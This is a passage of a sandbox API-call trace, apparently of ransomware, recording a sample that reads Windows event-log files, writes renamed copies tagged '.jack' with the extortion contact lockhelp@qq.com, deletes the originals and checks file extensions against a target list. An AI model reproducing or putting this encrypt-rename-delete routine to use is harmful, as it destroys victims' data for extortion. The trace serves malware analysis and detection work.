(lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0206.043] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0206.043] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0206.043] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0206.043] ReadFile (in: hFile=0x430, lpBuffer=0x4229058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4229058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0206.046] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0206.046] ReadFile (in: hFile=0x430, lpBuffer=0x4269058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x4269058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0206.048] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0206.048] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0206.048] ReadFile (in: hFile=0x430, lpBuffer=0x42a9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x42a9058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0206.265] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.265] WriteFile (in: hFile=0x430, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xc015c, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fca8*=0xc015c, lpOverlapped=0x0) returned 1 [0206.372] SetEndOfFile (hFile=0x430) returned 1 [0207.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4791058 [0207.093] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0207.093] WriteFile (in: hFile=0x430, lpBuffer=0x4791058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4791058*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0207.095] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0207.095] WriteFile (in: hFile=0x430, lpBuffer=0x4791058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4791058*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0207.096] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0207.097] WriteFile (in: hFile=0x430, lpBuffer=0x4791058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x4791058*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0207.098] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4791058 | out: hHeap=0x5e0000) returned 1 [0207.098] CloseHandle (hObject=0x430) returned 1 [0207.425] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.426] lstrlenW (lpString=".doc") returned 4 [0207.426] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".docx") returned 5 [0207.426] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.426] lstrlenW (lpString=".pdf") returned 4 [0207.426] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".xls") returned 4 [0207.426] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".xlsx") returned 5 [0207.426] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.426] lstrlenW (lpString=".ppt") returned 4 [0207.426] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.426] lstrlenW (lpString=".zip") returned 4 [0207.426] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".rar") returned 4 [0207.426] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".bz2") returned 4 [0207.426] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString=".7z") returned 3 [0207.426] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.426] lstrlenW (lpString=".dbf") returned 4 [0207.426] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.426] lstrlenW (lpString=".1cd") returned 4 [0207.426] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.427] lstrlenW (lpString=".jpg") returned 4 [0207.427] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.427] lstrlenW (lpString=".doc") returned 4 [0207.427] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".docx") returned 5 [0207.427] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.427] lstrlenW (lpString=".pdf") returned 4 [0207.427] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".xls") returned 4 [0207.427] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".xlsx") returned 5 [0207.427] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.427] lstrlenW (lpString=".ppt") returned 4 [0207.427] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.427] lstrlenW (lpString=".zip") returned 4 [0207.427] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".rar") returned 4 [0207.427] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".bz2") returned 4 [0207.427] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString=".7z") returned 3 [0207.427] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.427] lstrlenW (lpString=".dbf") returned 4 [0207.427] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.428] lstrlenW (lpString=".1cd") returned 4 [0207.428] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.428] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0207.428] lstrlenW (lpString=".jpg") returned 4 [0207.428] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.428] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.428] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 48 [0207.428] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.428] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0207.428] CloseHandle (hObject=0x430) returned 1 [0207.428] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 0x20 [0207.616] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.616] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.616] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.616] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.616] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0207.616] GetLastError () returned 0x0 [0207.616] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.618] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.620] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.620] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x134, lpOverlapped=0x0) returned 1 [0207.620] SetEndOfFile (hFile=0x3dc) returned 1 [0207.620] CloseHandle (hObject=0x3dc) returned 1 [0207.625] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.625] SetEndOfFile (hFile=0x430) returned 1 [0207.626] CloseHandle (hObject=0x430) returned 1 [0207.627] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.627] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 1 [0207.628] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.628] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.628] lstrlenW (lpString=".doc") returned 4 [0207.628] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.628] lstrlenW (lpString=".docx") returned 5 [0207.628] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.628] lstrlenW (lpString=".pdf") returned 4 [0207.628] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.628] lstrlenW (lpString=".xls") returned 4 [0207.628] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.628] lstrlenW (lpString=".xlsx") returned 5 [0207.628] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.629] lstrlenW (lpString=".ppt") returned 4 [0207.629] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.629] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.629] lstrlenW (lpString=".zip") returned 4 [0207.629] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.629] lstrlenW (lpString=".rar") returned 4 [0207.629] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString=".bz2") returned 4 [0207.630] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString=".7z") returned 3 [0207.630] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.630] lstrlenW (lpString=".dbf") returned 4 [0207.630] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.630] lstrlenW (lpString=".1cd") returned 4 [0207.630] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.630] lstrlenW (lpString=".jpg") returned 4 [0207.630] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.630] lstrlenW (lpString=".doc") returned 4 [0207.630] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString=".docx") returned 5 [0207.630] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.630] lstrlenW (lpString=".pdf") returned 4 [0207.630] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString=".xls") returned 4 [0207.630] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.630] lstrlenW (lpString=".xlsx") returned 5 [0207.630] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.630] lstrlenW (lpString=".ppt") returned 4 [0207.630] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.631] lstrlenW (lpString=".zip") returned 4 [0207.631] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString=".rar") returned 4 [0207.631] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString=".bz2") returned 4 [0207.631] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString=".7z") returned 3 [0207.631] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.631] lstrlenW (lpString=".dbf") returned 4 [0207.631] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.631] lstrlenW (lpString=".1cd") returned 4 [0207.631] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 56 [0207.631] lstrlenW (lpString=".jpg") returned 4 [0207.631] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.631] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.631] lstrlenW (lpString="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 49 [0207.631] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.632] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0207.632] CloseHandle (hObject=0x430) returned 1 [0207.633] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 0x20 [0207.633] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.633] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.633] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.633] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.633] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0207.634] GetLastError () returned 0x0 [0207.634] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.636] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.638] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.638] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x136, lpOverlapped=0x0) returned 1 [0207.638] SetEndOfFile (hFile=0x3dc) returned 1 [0207.638] CloseHandle (hObject=0x3dc) returned 1 [0207.641] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.641] SetEndOfFile (hFile=0x430) returned 1 [0207.642] CloseHandle (hObject=0x430) returned 1 [0207.642] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.643] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 1 [0207.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.643] lstrlenW (lpString=".doc") returned 4 [0207.643] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.643] lstrlenW (lpString=".docx") returned 5 [0207.643] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.643] lstrlenW (lpString=".pdf") returned 4 [0207.643] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.643] lstrlenW (lpString=".xls") returned 4 [0207.643] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.643] lstrlenW (lpString=".xlsx") returned 5 [0207.643] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.644] lstrlenW (lpString=".ppt") returned 4 [0207.644] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString=".zip") returned 4 [0207.644] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString=".rar") returned 4 [0207.644] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString=".bz2") returned 4 [0207.644] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString=".7z") returned 3 [0207.644] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString=".dbf") returned 4 [0207.644] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString=".1cd") returned 4 [0207.644] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString=".jpg") returned 4 [0207.644] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.644] lstrlenW (lpString=".doc") returned 4 [0207.644] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.644] lstrlenW (lpString=".docx") returned 5 [0207.644] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.645] lstrlenW (lpString=".pdf") returned 4 [0207.645] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString=".xls") returned 4 [0207.645] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString=".xlsx") returned 5 [0207.645] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.645] lstrlenW (lpString=".ppt") returned 4 [0207.645] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.645] lstrlenW (lpString=".zip") returned 4 [0207.645] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString=".rar") returned 4 [0207.645] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString=".bz2") returned 4 [0207.645] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString=".7z") returned 3 [0207.645] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.645] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.645] lstrlenW (lpString=".dbf") returned 4 [0207.645] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.645] lstrlenW (lpString=".1cd") returned 4 [0207.645] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.645] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0207.645] lstrlenW (lpString=".jpg") returned 4 [0207.645] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.646] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.646] lstrlenW (lpString="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 59 [0207.646] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0207.646] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0207.646] CloseHandle (hObject=0x430) returned 1 [0207.646] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 0x20 [0207.646] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: 